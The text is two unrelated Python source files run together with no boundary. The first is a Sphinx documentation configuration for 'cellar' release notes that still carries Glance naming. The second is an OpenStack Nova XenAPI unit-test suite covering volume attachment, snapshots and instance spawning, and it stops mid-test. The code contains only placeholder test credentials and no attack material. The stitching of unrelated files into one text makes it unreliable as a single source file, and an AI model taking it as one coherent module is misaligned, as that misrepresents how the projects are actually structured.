# See the License for the specific language governing permissions and
# limitations under the License.

# Glance Release Notes documentation build configuration file, created by
# sphinx-quickstart on Tue Nov  3 17:40:50 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))

# -- General configuration ------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'oslosphinx',       # OpenStack Sphinx theme/helpers
    'reno.sphinxext',   # renders reno release-note files into the docs
]

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
# source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
# NOTE(review): project is 'cellar' here, but several output settings
# below (htmlhelp/latex/man/texinfo) still say 'Glance' — presumably
# copied from Glance's conf.py; confirm intended naming.
project = u'cellar Release Notes'
copyright = u'2016, OpenStack Foundation'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
# NOTE(review): left empty — this release-notes build appears to be
# intentionally unversioned; confirm.
release = ''
# The short X.Y version.
version = ''

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# (Empty: nothing is excluded.)
exclude_patterns = []

# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
# 'sphinx' is the style shipped with Sphinx itself.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []

# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False


# -- Options for HTML output ----------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
# 'default' is the classic built-in Sphinx theme.
html_theme = 'default'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []

# The name for this set of Sphinx documents.  If None, it defaults to
# "<project> v<release> documentation".
# html_title = None

# A shorter title for the navigation bar.  Default is the same as html_title.
# html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs.  This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']  # project-local static assets

# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}

# If false, no module index is generated.
# html_domain_indices = True

# If false, no index is generated.
# html_use_index = True

# If true, the index is split into individual pages for each letter.
# html_split_index = False

# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it.  The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None

# Output file base name for HTML help builder.
# NOTE(review): still references 'Glance' although this is the cellar
# release-notes build — confirm intended.
htmlhelp_basename = 'GlanceReleaseNotesdoc'


# -- Options for LaTeX output ---------------------------------------------

# All LaTeX settings are left at their Sphinx defaults.
latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    # 'papersize': 'letterpaper',

    # The font size ('10pt', '11pt' or '12pt').
    # 'pointsize': '10pt',

    # Additional stuff for the LaTeX preamble.
    # 'preamble': '',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
# NOTE(review): target name/title/author still say 'Glance' — confirm.
latex_documents = [
    ('index', 'GlanceReleaseNotes.tex', u'Glance Release Notes Documentation',
     u'Glance Developers', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False

# If true, show page references after internal links.
# latex_show_pagerefs = False

# If true, show URL addresses after external links.
# latex_show_urls = False

# Documents to append as an appendix to all manuals.
# latex_appendices = []

# If false, no module index is generated.
# latex_domain_indices = True


# -- Options for manual page output ---------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
# NOTE(review): name/description still say 'glance' — confirm.
man_pages = [
    ('index', 'glancereleasenotes', u'Glance Release Notes Documentation',
     [u'Glance Developers'], 1)
]

# If true, show URL addresses after external links.
# man_show_urls = False


# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
# NOTE(review): entries still say 'Glance' — confirm.
texinfo_documents = [
    ('index', 'GlanceReleaseNotes', u'Glance Release Notes Documentation',
     u'Glance Developers', 'GlanceReleaseNotes',
     'One line description of project.',
     'Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
# texinfo_appendices = []

# If false, no module index is generated.
# texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'

# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False

# vim: tabstop=4 shiftwidth=4 softtabstop=4

#    Copyright (c) 2010 Citrix Systems, Inc.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

"""Test suite for XenAPI."""

import ast
import contextlib
import datetime
import functools
import os
import re

import mox

from nova.compute import aggregate_states
from nova.compute import instance_types
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova import context
from nova import db
from nova import exception
from nova import flags
from nova import log as logging
from nova.openstack.common import importutils
from nova import test
from nova.tests.db import fakes as db_fakes
from nova.tests import fake_network
from nova.tests import fake_utils
from nova.tests.glance import stubs as glance_stubs
from nova.tests.xenapi import stubs
from nova.virt.xenapi import connection as xenapi_conn
from nova.virt.xenapi import fake as xenapi_fake
from nova.virt.xenapi import vm_utils
from nova.virt.xenapi import vmops
from nova.virt.xenapi import volume_utils

LOG = logging.getLogger(__name__)

# Global flags registry shared across the nova test framework.
FLAGS = flags.FLAGS


def stub_vm_utils_with_vdi_attached_here(function, should_return=True):
    """
    vm_utils.with_vdi_attached_here needs to be stubbed out because it
    calls down to the filesystem to attach a vdi. This provides a
    decorator to handle that.
    """
    @functools.wraps(function)
    def decorated_function(self, *args, **kwargs):
        @contextlib.contextmanager
        def fake_vdi_attached_here(*args, **kwargs):
            yield 'fakedev'

        def fake_stream_disk(*args, **kwargs):
            pass

        def fake_is_vdi_pv(*args, **kwargs):
            return should_return

        # Remember the real implementations so they can be restored even
        # if the wrapped test raises.
        originals = (vm_utils.vdi_attached_here,
                     vm_utils._stream_disk,
                     vm_utils._is_vdi_pv)
        vm_utils.vdi_attached_here = fake_vdi_attached_here
        vm_utils._stream_disk = fake_stream_disk
        vm_utils._is_vdi_pv = fake_is_vdi_pv
        try:
            return function(self, *args, **kwargs)
        finally:
            (vm_utils.vdi_attached_here,
             vm_utils._stream_disk,
             vm_utils._is_vdi_pv) = originals

    return decorated_function


class XenAPIVolumeTestCase(test.TestCase):
    """Unit tests for Volume operations."""
    def setUp(self):
        super(XenAPIVolumeTestCase, self).setUp()
        self.user_id = 'fake'
        self.project_id = 'fake'
        self.context = context.RequestContext(self.user_id, self.project_id)
        self.flags(target_host='127.0.0.1',
                xenapi_connection_url='test_url',
                xenapi_connection_password='test_pass',
                firewall_driver='nova.virt.xenapi.firewall.'
                                'Dom0IptablesFirewallDriver')
        db_fakes.stub_out_db_instance_api(self.stubs)
        xenapi_fake.reset()
        # Template values for the instances created by individual tests.
        # NOTE: previously 'project_id' was (harmlessly) taken from
        # self.user_id; both are 'fake' but use the right attribute.
        self.instance_values = {'id': 1,
                  'project_id': self.project_id,
                  'user_id': self.user_id,
                  'image_ref': 1,
                  'kernel_id': 2,
                  'ramdisk_id': 3,
                  'root_gb': 20,
                  'instance_type_id': '3',  # m1.large
                  'os_type': 'linux',
                  'architecture': 'x86-64'}

    def _create_volume(self, size='0'):
        """Create a volume object."""
        vol = {}
        vol['size'] = size
        vol['user_id'] = 'fake'
        vol['project_id'] = 'fake'
        vol['host'] = 'localhost'
        vol['availability_zone'] = FLAGS.storage_availability_zone
        vol['status'] = "creating"
        vol['attach_status'] = "detached"
        return db.volume_create(self.context, vol)

    @staticmethod
    def _make_info():
        """Return iSCSI connection info as a volume driver would build it.

        The original dict repeated the 'auth_method' key three times, so
        only the last value ('fake') survived and the CHAP credentials
        were never present; each key now appears exactly once.
        """
        return {
            'driver_volume_type': 'iscsi',
            'data': {
                'volume_id': 1,
                'target_iqn': 'iqn.2010-10.org.openstack:volume-00000001',
                'target_portal': '127.0.0.1:3260,fake',
                'target_lun': None,
                'auth_method': 'CHAP',
                'auth_username': 'fake',
                'auth_password': 'fake',
            }
        }

    def test_mountpoint_to_number(self):
        # Map of mountpoint name -> expected device number (-1 = invalid).
        cases = {
            'sda': 0,
            'sdp': 15,
            'hda': 0,
            'hdp': 15,
            'vda': 0,
            'xvda': 0,
            '0': 0,
            '10': 10,
            'vdq': -1,
            'sdq': -1,
            'hdq': -1,
            'xvdq': -1,
        }

        # 'mountpoint' rather than 'input' to avoid shadowing the builtin.
        for (mountpoint, expected) in cases.iteritems():
            func = volume_utils.VolumeHelper.mountpoint_to_number
            actual = func(mountpoint)
            self.assertEqual(actual, expected,
                    '%s yielded %s, not %s' % (mountpoint, actual, expected))

    def test_parse_volume_info_raise_exception(self):
        """This shows how to test helper classes' methods."""
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVolumeTests)
        session = xenapi_conn.XenAPISession('test_url', 'root', 'test_pass')
        helper = volume_utils.VolumeHelper
        helper.XenAPI = session.get_imported_xenapi()
        vol = self._create_volume()
        # oops, wrong mount point!
        self.assertRaises(volume_utils.StorageError,
                          helper.parse_volume_info,
                          self._make_info(),
                          'dev/sd'
                          )
        db.volume_destroy(context.get_admin_context(), vol['id'])

    def test_attach_volume(self):
        """This shows how to test Ops classes' methods."""
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVolumeTests)
        conn = xenapi_conn.get_connection(False)
        volume = self._create_volume()
        instance = db.instance_create(self.context, self.instance_values)
        vm = xenapi_fake.create_vm(instance.name, 'Running')
        result = conn.attach_volume(self._make_info(),
                                    instance.name, '/dev/sdc')

        # check that the VM has a VBD attached to it
        # Get XenAPI record for VBD
        vbds = xenapi_fake.get_all('VBD')
        vbd = xenapi_fake.get_record('VBD', vbds[0])
        vm_ref = vbd['VM']
        self.assertEqual(vm_ref, vm)

    def test_attach_volume_raise_exception(self):
        """This shows how to test when exceptions are raised."""
        stubs.stubout_session(self.stubs,
                              stubs.FakeSessionForVolumeFailedTests)
        conn = xenapi_conn.get_connection(False)
        volume = self._create_volume()
        instance = db.instance_create(self.context, self.instance_values)
        xenapi_fake.create_vm(instance.name, 'Running')
        # An unknown driver_volume_type must be rejected.
        self.assertRaises(exception.VolumeDriverNotFound,
                          conn.attach_volume,
                          {'driver_volume_type': 'nonexist'},
                          instance.name,
                          '/dev/sdc')


class XenAPIVMTestCase(test.TestCase):
    """Unit tests for VM operations."""
    def setUp(self):
        super(XenAPIVMTestCase, self).setUp()
        self.network = importutils.import_object(FLAGS.network_manager)
        self.flags(xenapi_connection_url='test_url',
                   xenapi_connection_password='test_pass',
                   instance_name_template='%d',
                   firewall_driver='nova.virt.xenapi.firewall.'
                                   'Dom0IptablesFirewallDriver')
        # Reset the in-memory fake XenAPI server and give it local
        # storage/network objects before any stubbing.
        xenapi_fake.reset()
        xenapi_fake.create_local_srs()
        xenapi_fake.create_local_pifs()
        db_fakes.stub_out_db_instance_api(self.stubs)
        xenapi_fake.create_network('fake', FLAGS.flat_network_bridge)
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        stubs.stubout_get_this_vm_uuid(self.stubs)
        stubs.stubout_stream_disk(self.stubs)
        stubs.stubout_is_vdi_pv(self.stubs)
        stubs.stub_out_vm_methods(self.stubs)
        glance_stubs.stubout_glance_client(self.stubs)
        fake_utils.stub_out_utils_execute(self.stubs)
        self.user_id = 'fake'
        self.project_id = 'fake'
        self.context = context.RequestContext(self.user_id, self.project_id)
        self.conn = xenapi_conn.get_connection(False)

    def test_init_host(self):
        session = xenapi_conn.XenAPISession('test_url', 'root', 'test_pass')
        vm = vm_utils.get_this_vm_ref(session)
        # Local root disk
        vdi0 = xenapi_fake.create_vdi('compute', None)
        vbd0 = xenapi_fake.create_vbd(vm, vdi0)
        # Instance VDI
        vdi1 = xenapi_fake.create_vdi('instance-aaaa', None,
                other_config={'nova_instance_uuid': 'aaaa'})
        vbd1 = xenapi_fake.create_vbd(vm, vdi1)
        # Only looks like instance VDI
        vdi2 = xenapi_fake.create_vdi('instance-bbbb', None)
        vbd2 = xenapi_fake.create_vbd(vm, vdi2)

        # init_host should unplug only the real instance VBD (vbd1),
        # leaving the root disk and the lookalike attached.
        self.conn.init_host(None)
        self.assertEquals(set(xenapi_fake.get_all('VBD')), set([vbd0, vbd2]))

    def test_list_instances_0(self):
        instances = self.conn.list_instances()
        self.assertEquals(instances, [])

    def test_get_rrd_server(self):
        # get_rrd_server should parse scheme and address from the
        # configured connection URL.
        self.flags(xenapi_connection_url='myscheme://myaddress/')
        server_info = vm_utils.get_rrd_server()
        self.assertEqual(server_info[0], 'myscheme')
        self.assertEqual(server_info[1], 'myaddress')

    def test_get_diagnostics(self):
        def fake_get_rrd(host, vm_uuid):
            # Serve a canned RRD XML document with whitespace stripped.
            with open('xenapi/vm_rrd.xml') as f:
                return re.sub(r'\s', '', f.read())
        self.stubs.Set(vm_utils, 'get_rrd', fake_get_rrd)

        # Expected values parsed out of the canned RRD above.
        fake_diagnostics = {
            'vbd_xvdb_write': '0.0',
            'memory_target': '10961792000.0000',
            'memory_internal_free': '3612860.6020',
            'memory': '10961792000.0000',
            'vbd_xvda_write': '0.0',
            'cpu0': '0.0110',
            'vif_0_tx': '752.4007',
            'vbd_xvda_read': '0.0',
            'vif_0_rx': '4837.8805'
        }
        instance = self._create_instance()
        expected = self.conn.get_diagnostics(instance)
        self.assertDictMatch(fake_diagnostics, expected)

    def test_instance_snapshot_fails_with_no_primary_vdi(self):
        def create_bad_vbd(vm_ref, vdi_ref):
            # Build a VBD whose userdevice is not '0', so no primary
            # (root) VDI can be found during snapshot.
            vbd_rec = {'VM': vm_ref,
               'VDI': vdi_ref,
               'userdevice': 'fake',
               'currently_attached': False}
            vbd_ref = xenapi_fake._create_object('VBD', vbd_rec)
            xenapi_fake.after_VBD_create(vbd_ref, vbd_rec)
            return vbd_ref

        self.stubs.Set(xenapi_fake, 'create_vbd', create_bad_vbd)
        stubs.stubout_instance_snapshot(self.stubs)
        # Stub out the firewall driver, as the previous stub alters
        # XML-RPC result parsing
        stubs.stubout_firewall_driver(self.stubs, self.conn)
        instance = self._create_instance()

        name = "MySnapshot"
        self.assertRaises(exception.NovaException, self.conn.snapshot,
                          self.context, instance, name)

    def test_instance_snapshot(self):
        stubs.stubout_instance_snapshot(self.stubs)
        stubs.stubout_is_snapshot(self.stubs)
        # Stub out the firewall driver, as the previous stub alters
        # XML-RPC result parsing
        stubs.stubout_firewall_driver(self.stubs, self.conn)
        instance = self._create_instance()

        name = "MySnapshot"
        template_vm_ref = self.conn.snapshot(self.context, instance, name)

        # Ensure VM was torn down
        vm_labels = []
        for vm_ref in xenapi_fake.get_all('VM'):
            vm_rec = xenapi_fake.get_record('VM', vm_ref)
            if not vm_rec["is_control_domain"]:
                vm_labels.append(vm_rec["name_label"])

        self.assertEquals(vm_labels, [instance.name])

        # Ensure VBDs were torn down
        vbd_labels = []
        for vbd_ref in xenapi_fake.get_all('VBD'):
            vbd_rec = xenapi_fake.get_record('VBD', vbd_ref)
            vbd_labels.append(vbd_rec["vm_name_label"])

        self.assertEquals(vbd_labels, [instance.name])

        # Ensure VDIs were torn down
        for vdi_ref in xenapi_fake.get_all('VDI'):
            vdi_rec = xenapi_fake.get_record('VDI', vdi_ref)
            name_label = vdi_rec["name_label"]
            self.assert_(not name_label.endswith('snapshot'))

    def create_vm_record(self, conn, os_type, name):
        """Look up the spawned VM and stash its Nova and XenAPI records
        on self.vm_info / self.vm for later checks."""
        instances = conn.list_instances()
        self.assertEquals(instances, [name])

        # Get Nova record for VM
        vm_info = conn.get_info({'name': name})
        # Get XenAPI record for VM
        vms = [rec for ref, rec
               in xenapi_fake.get_all_records('VM').iteritems()
               if not rec['is_control_domain']]
        vm = vms[0]
        self.vm_info = vm_info
        self.vm = vm

    def check_vm_record(self, conn, check_injection=False):
        """Verify the records stashed by create_vm_record match the
        m1.large instance type, and optionally the injected network
        config in xenstore."""
        # Check that m1.large above turned into the right thing.
        instance_type = db.instance_type_get_by_name(conn, 'm1.large')
        mem_kib = long(instance_type['memory_mb']) << 10
        mem_bytes = str(mem_kib << 10)
        vcpus = instance_type['vcpus']
        self.assertEquals(self.vm_info['max_mem'], mem_kib)
        self.assertEquals(self.vm_info['mem'], mem_kib)
        self.assertEquals(self.vm['memory_static_max'], mem_bytes)
        self.assertEquals(self.vm['memory_dynamic_max'], mem_bytes)
        self.assertEquals(self.vm['memory_dynamic_min'], mem_bytes)
        self.assertEquals(self.vm['VCPUs_max'], str(vcpus))
        self.assertEquals(self.vm['VCPUs_at_startup'], str(vcpus))

        # Check that the VM is running according to Nova
        self.assertEquals(self.vm_info['state'], power_state.RUNNING)

        # Check that the VM is running according to XenAPI.
        self.assertEquals(self.vm['power_state'], 'Running')

        if check_injection:
            xenstore_data = self.vm['xenstore_data']
            self.assertEquals(xenstore_data['vm-data/hostname'], 'test')
            key = 'vm-data/networking/DEADBEEF0000'
            xenstore_value = xenstore_data[key]
            tcpip_data = ast.literal_eval(xenstore_value)
            self.assertEquals(tcpip_data,
                              {'broadcast': '192.168.0.255',
                               'dns': ['192.168.0.1'],
                               'gateway': '192.168.0.1',
                               'gateway_v6': 'dead:beef::1',
                               'ip6s': [{'enabled': '1',
                                         'ip': 'dead:beef::dcad:beff:feef:0',
                                               'netmask': '64'}],
                               'ips': [{'enabled': '1',
                                        'ip': '192.168.0.100',
                                        'netmask': '255.255.255.0'}],
                               'dhcp_server': '192.168.0.1',
                               'label': 'fake',
                               'mac': 'DE:AD:BE:EF:00:00',
                               'rxtx_cap': 3})

    def check_vm_params_for_windows(self):
        # Windows guests boot via HVM with NX enabled.
        self.assertEquals(self.vm['platform']['nx'], 'true')
        self.assertEquals(self.vm['HVM_boot_params'], {'order': 'dc'})
        self.assertEquals(self.vm['HVM_boot_policy'], 'BIOS order')

        # check that these are not set
        self.assertEquals(self.vm['PV_args'], '')
        self.assertEquals(self.vm['PV_bootloader'], '')
        self.assertEquals(self.vm['PV_kernel'], '')
        self.assertEquals(self.vm['PV_ramdisk'], '')

    def check_vm_params_for_linux(self):
        # PV Linux guests boot via pygrub with no external kernel.
        self.assertEquals(self.vm['platform']['nx'], 'false')
        self.assertEquals(self.vm['PV_args'], '')
        self.assertEquals(self.vm['PV_bootloader'], 'pygrub')

        # check that these are not set
        self.assertEquals(self.vm['PV_kernel'], '')
        self.assertEquals(self.vm['PV_ramdisk'], '')
        self.assertEquals(self.vm['HVM_boot_params'], {})
        self.assertEquals(self.vm['HVM_boot_policy'], '')

    def check_vm_params_for_linux_with_external_kernel(self):
        # PV Linux guests with a separate kernel/ramdisk image.
        self.assertEquals(self.vm['platform']['nx'], 'false')
        self.assertEquals(self.vm['PV_args'], 'root=/dev/xvda1')
        self.assertNotEquals(self.vm['PV_kernel'], '')
        self.assertNotEquals(self.vm['PV_ramdisk'], '')

        # check that these are not set
        self.assertEquals(self.vm['HVM_boot_params'], {})
        self.assertEquals(self.vm['HVM_boot_policy'], '')

    def _list_vdis(self):
        """Return all VDI refs known to the (fake) XenAPI server."""
        url = FLAGS.xenapi_connection_url
        username = FLAGS.xenapi_connection_username
        password = FLAGS.xenapi_connection_password
        session = xenapi_conn.XenAPISession(url, username, password)
        return session.call_xenapi('VDI.get_all')

    def _check_vdis(self, start_list, end_list):
        """Fail if end_list contains VDIs not in start_list, excluding
        cached base disks (which legitimately survive cleanup)."""
        for vdi_ref in end_list:
            if not vdi_ref in start_list:
                vdi_rec = xenapi_fake.get_record('VDI', vdi_ref)
                # If the cache is turned on then the base disk will be
                # there even after the cleanup
                if 'other_config' in vdi_rec:
                    if vdi_rec['other_config']['image-id'] is None:
                        self.fail('Found unexpected VDI:%s' % vdi_ref)
                else:
                    self.fail('Found unexpected VDI:%s' % vdi_ref)

    def _test_spawn(self, image_ref, kernel_id, ramdisk_id,
                    instance_type_id="3", os_type="linux",
                    hostname="test", architecture="x86-64", instance_id=1,
                    check_injection=False,
                    create_record=True, empty_dns=False):
        """Spawn an instance through the driver and verify the resulting
        Nova and XenAPI records (common helper for the spawn tests)."""
        if create_record:
            instance_values = {'id': instance_id,
                      'project_id': self.project_id,
                      'user_id': self.user_id,
                      'image_ref': image_ref,
                      'kernel_id': kernel_id,
                      'ramdisk_id': ramdisk_id,
                      'root_gb': 20,
                      'instance_type_id': instance_type_id,
                      'os_type': os_type,
                      'hostname': hostname,
                      'architecture': architecture}
            instance = db.instance_create(self.context, instance_values)
        else:
            instance = db.instance_get(self.context, instance_id)
        # (network, info) pair as the network manager would supply it.
        network_info = [({'bridge': 'fa0', 'id': 0,
                          'injected': True,
                          'cidr': '192.168.0.0/24',
                          'cidr_v6': 'dead:beef::1/120',
                          },
                          {'broadcast': '192.168.0.255',
                           'dns': ['192.168.0.1'],
                           'gateway': '192.168.0.1',
                           'gateway_v6': 'dead:beef::1',
                           'ip6s': [{'enabled': '1',
                                     'ip': 'dead:beef::dcad:beff:feef:0',
                                           'netmask': '64'}],
                           'ips': [{'enabled': '1',
                                    'ip': '192.168.0.100',
                                    'netmask': '255.255.255.0'}],
                           'dhcp_server': '192.168.0.1',
                           'label': 'fake',
                           'mac': 'DE:AD:BE:EF:00:00',
                           'rxtx_cap': 3})]
        if empty_dns:
            network_info[0][1]['dns'] = []

        # admin_pass isn't part of the DB model, but it does get set as
        # an attribute for spawn to use
        instance.admin_pass = 'herp'
        image_meta = {'id': glance_stubs.FakeGlance.IMAGE_VHD,
                      'disk_format': 'vhd'}
        self.conn.spawn(self.context, instance, image_meta, network_info)
        self.create_vm_record(self.conn, os_type, instance['name'])
        self.check_vm_record(self.conn, check_injection)
        self.assertTrue(instance.os_type)
        self.assertTrue(instance.architecture)

    def test_spawn_empty_dns(self):
        """Test spawning with an empty dns list"""
        self._test_spawn(glance_stubs.FakeGlance.IMAGE_VHD, None, None,
                         os_type="linux", architecture="x86-64",
                         empty_dns=True)
        self.check_vm_params_for_linux()

    def test_spawn_not_enough_memory(self):
        self.assertRaises(exception.InsufficientFreeMemory,
                          self._test_spawn,
                          1, 2, 3, "4")  # m1.xlarge

    def test_spawn_fail_cleanup_1(self):
        """Simulates an error while downloading an image.

        Verifies that VDIs created are properly cleaned up.

        """
        vdi_recs_start = self._list_vdis()
        stubs.stubout_fetch_image_glance_disk(self.stubs, raise_failure=True)
        self.assertRaises(xenapi_fake.Failure,
                          self._test_spawn, 1, 2, 3)
        # No additional VDI should be found.
        vdi_recs_end = self._list_vdis()
        self._check_vdis(vdi_recs_start, vdi_recs_end)

    def test_spawn_fail_cleanup_2(self):
        """Simulates an error while creating VM record.

        It verifies that VDIs created are properly cleaned up.

        """
        vdi_recs_start = self._list_vdis()
        stubs.stubout_create_vm(self.stubs)
        self.assertRaises(xenapi_fake.Failure,
                          self._test_spawn, 1, 2, 3)
        # No additional VDI should be found.
        vdi_recs_end = self._list_vdis()
        self._check_vdis(vdi_recs_start, vdi_recs_end)

    @stub_vm_utils_with_vdi_attached_here
    def test_spawn_raw_glance(self):
        self._test_spawn(glance_stubs.FakeGlance.IMAGE_RAW, None, None)
        self.check_vm_params_for_linux()

    def test_spawn_vhd_glance_linux(self):
        self._test_spawn(glance_stubs.FakeGlance.IMAGE_VHD, None, None,
                         os_type="linux", architecture="x86-64")
        self.check_vm_params_for_linux()

    def test_spawn_vhd_glance_swapdisk(self):
        # Change the default host_call_plugin to one that'll return
        # a swap disk
        orig_func = stubs.FakeSessionForVMTests.host_call_plugin
        _host_call_plugin = stubs.FakeSessionForVMTests.host_call_plugin_swap
        stubs.FakeSessionForVMTests.host_call_plugin = _host_call_plugin
        # Stubbing out firewall driver as previous stub sets a particular
        # stub for async plugin calls
        stubs.stubout_firewall_driver(self.stubs, self.conn)
        try:
            # We'll steal the above glance linux test
            self.test_spawn_vhd_glance_linux()
        finally:
            # Make sure to put this back
            stubs.FakeSessionForVMTests.host_call_plugin = orig_func

        # We should have 2 VBDs.
        self.assertEqual(len(self.vm['VBDs']), 2)
        # Now test that we have 1.
        self.tearDown()
        self.setUp()
        self.test_spawn_vhd_glance_linux()
        self.assertEqual(len(self.vm['VBDs']), 1)

    def test_spawn_vhd_glance_windows(self):
        self._test_spawn(glance_stubs.FakeGlance.IMAGE_VHD, None, None,
                         os_type="windows", architecture="i386")
        self.check_vm_params_for_windows()

    def test_spawn_iso_glance(self):
        self._test_spawn(glance_stubs.FakeGlance.IMAGE_ISO, None, None,
                         os_type="windows", architecture="i386")
        self.check_vm_params_for_windows()

    def test_spawn_glance(self):
        stubs.stubout_fetch_image_glance_disk(self.stubs)
        self._test_spawn(glance_stubs.FakeGlance.IMAGE_MACHINE,
                         glance_stubs.FakeGlance.IMAGE_KERNEL,
                         glance_stubs.FakeGlance.IMAGE_RAMDISK)
        self.check_vm_params_for_linux_with_external_kernel()

    def test_spawn_netinject_file(self):
        self.flags(flat_injected=True)
        db_fakes.stub_out_db_instance_api(self.stubs, injected=True)

        self._tee_executed = False

        def _tee_handler(cmd, **kwargs):
            # Verify the interfaces file piped through tee contains the
            # expected eth0 configuration.
            input = kwargs.get('process_input', None)
            self.assertNotEqual(input, None)
            config = [line.strip() for line in input.split("\n")]
            # Find the start of eth0 configuration and check it
            index = config.index('auto eth0')
            self.assertEquals(config[index + 1:index + 8], [
                'iface eth0 inet static',
                'address 192.168.0.100',
                'netmask 255.255.255.0',
                'broadcast 192.168.0.255',
                'gateway 192.168.0.1',
                'dns-nameservers 192.168.0.1',
                ''])
            self._tee_executed = True
            return '', ''

        fake_utils.fake_execute_set_repliers([
            # Capture the tee .../etc/network/interfaces command
            (r'tee.*interfaces', _tee_handler),
        ])
        self._test_spawn(glance_stubs.FakeGlance.IMAGE_MACHINE,
                         glance_stubs.FakeGlance.IMAGE_KERNEL,
                         glance_stubs.FakeGlance.IMAGE_RAMDISK,
                         check_injection=True)
        self.assertTrue(self._tee_executed)

    def test_spawn_netinject_xenstore(self):
        db_fakes.stub_out_db_instance_api(self.stubs, injected=True)

        self._tee_executed = False

        def _mount_handler(cmd, *ignore_args, **ignore_kwargs):
            # When mounting, create real files under the mountpoint to simulate
            # files in the mounted filesystem

            # mount point will be the last item of the command list
            self._tmpdir = cmd[len(cmd) - 1]
            LOG.debug(_('Creating files in %s to simulate guest agent'),
                      self._tmpdir)
            os.makedirs(os.path.join(self._tmpdir, 'usr', 'sbin'))
            # Touch the file using open
            open(os.path.join(self._tmpdir, 'usr', 'sbin',
                'xe-update-networking'), 'w').close()
            return '', ''

        def _umount_handler(cmd, *ignore_args, **ignore_kwargs):
            # Umount would normally make files in the mounted filesystem
            # disappear, so do that here
            LOG.debug(_('Removing simulated guest agent files in %s'),
                      self._tmpdir)
            os.remove(os.path.join(self._tmpdir, 'usr', 'sbin',
                'xe-update-networking'))
            os.rmdir(os.path.join(self._tmpdir, 'usr', 'sbin'))
            os.rmdir(os.path.join(self._tmpdir, 'usr'))
            return '', ''

        def _tee_handler(cmd, *ignore_args, **ignore_kwargs):
            self._tee_executed = True
            return '', ''

        fake_utils.fake_execute_set_repliers([
            (r'mount', _mount_handler),
            (r'umount', _umount_handler),
            (r'tee.*interfaces', _tee_handler)])
